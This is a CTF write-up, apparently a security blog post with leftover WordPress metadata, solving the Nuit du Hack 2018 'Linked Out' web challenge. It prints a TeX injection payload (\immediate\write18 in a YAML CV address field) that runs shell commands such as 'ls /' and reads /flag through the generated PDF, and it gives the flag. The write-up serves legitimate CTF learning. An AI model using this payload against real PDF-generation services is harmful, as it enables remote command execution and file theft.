The weekend of 03\/31\/2018 is pre-qualification for the Nuit du Hack 2018<\/a><\/strong>\u00a0as a Jeopardy CTF<\/strong>. Having had the opportunity and the time to participate with some colleagues and friends, here\u2019s a write-up resolution of the challenges which we could participate.<\/p>\n This web challenge allow to upload a YAML<\/a> curriculum vitae template<\/a>. The main idea is to inject some TeX vectors in this template to execute arbitrary commande on the file system and get the result in the generated CV as PDF.<\/p>\n When we go to the URL, the service is displayed:<\/p>\n Service LinkedOut<\/p><\/div>\n We can download a YAML predefined template of CV and send our modified version to produce a PDF:<\/p>\n T\u00e9l\u00e9chargement du template YAML et upload<\/p><\/div>\n The main target is to inject some TeX instructions into the YAML template, to update CV data. Focus on the “postal address” (wide string field on several line in the output PDF), we can use the “\\immediate” and “\\write18” TeX instruction to execute shell command.<\/p>\n Both\u00a0\\immediate\u00a0and\u00a0\\write\u00a0are TeX primitives. The\u00a0\\write\u00a0operation is used to write to a file stream. Like many other things in TeX, file streams are accessed by number (although usually real files are given symbolic names to make life easier). Stream 18 is ‘special’ as it is not a file at all: instead, it is a way of sending commands to the operating system (shell).<\/p><\/blockquote>\n The “address” value from the YAML template to the output PDF can be rewrite with these instructions. A shell command is executed, the result encoded in base64 and stored in a local file (avoiding special chars). Then, the content of this local file is put in the “address” field :<\/p>\n The output of “ls \/” is encoded in base64 and the content of “toto” file (“\\input{toto}”) is read and put into\u00a0“\\address” in the PDF.<\/p>\n ls \/<\/p><\/div>\n Output PDF file :<\/p>\n PDF du CV g\u00e9n\u00e9r\u00e9 pour ls \/<\/p><\/div>\n Decoding the base64 string :<\/p>\n The “\/flag” file is interesting, get it :<\/p>\n Cat \/flag<\/p><\/div>\n Corresponding PDF file :<\/p>\n Cat \/flag en PDF<\/p><\/div>\n Base64 decode :<\/p>\n Greeting to the whole team ! \ud83d\ude42<\/p>\n Sources & resources :<\/strong><\/p>\n <\/p>","protected":false},"excerpt":{"rendered":" Write-up of the challenge \u201cWeb \u2013 Linked Out\u201d of Nuit du\u00a0Hack 2018 CTF qualifications. The weekend of 03\/31\/2018 is pre-qualification […]<\/p>\n","protected":false},"author":1337,"featured_media":1963,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[524,523,526,531,516,14],"tags":[],"class_list":["post-2374","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf","category-events","category-ndh","category-ndh2k18","category-rce","category-vuln-exploit-poc"],"_links":{"self":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/2374","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/users\/1337"}],"replies":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/comments?post=2374"}],"version-history":[{"count":11,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/2374\/revisions"}],"predecessor-version":[{"id":2455,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/2374\/revisions\/2455"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/media\/1963"}],"wp:attachment":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/media?parent=2374"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/categories?post=2374"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/tags?post=2374"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}\n
![\"Service](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/LinkedOut05-242x300.png\")
<\/a>![\"T\u00e9l\u00e9chargement](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/LinkedOut06-300x145.png\")
<\/a>cv:\r\n personal_informations:\r\n firstname: Bruce\r\n lastname: Schneier\r\n address: 221b Baker Street, London, ENGLAND}\\address{\\immediate\\write18{ls \/|base64 > toto}\\input{toto}\r\n position: Security Expert ; Master of Internet\r\n\r\n[...]<\/pre>\n![\"ls](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/LinkedOut03-300x146.png\")
<\/a>![\"PDF](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/LinkedOut04-300x152.png\")
<\/a>bin\r\nboot\r\ndev\r\nentrypoint.sh\r\netc\r\nflag\r\nhome\r\nlib\r\nlib64\r\nmedia\r\nmnt\r\nopt\r\nproc\r\nroot\r\nrun\r\nsbin\r\nsrv\r\nsupervisord.log\r\nsupervisord.pid\r\nsys\r\ntmp\r\nusr\r\nvar<\/pre>\n
![\"Cat](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/LinkedOut02-300x157.png\")
<\/a>![\"Cat](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/LinkedOut01-300x160.png\")
<\/a>TkRIe0FuZF9Eb25hbGRfS251dGhfY3JlYXRlZF90aGVfaVRlWH0K\r\n\r\nFlag :\u00a0NDH{And_Donald_Knuth_created_the_iTeX}<\/pre>\n\n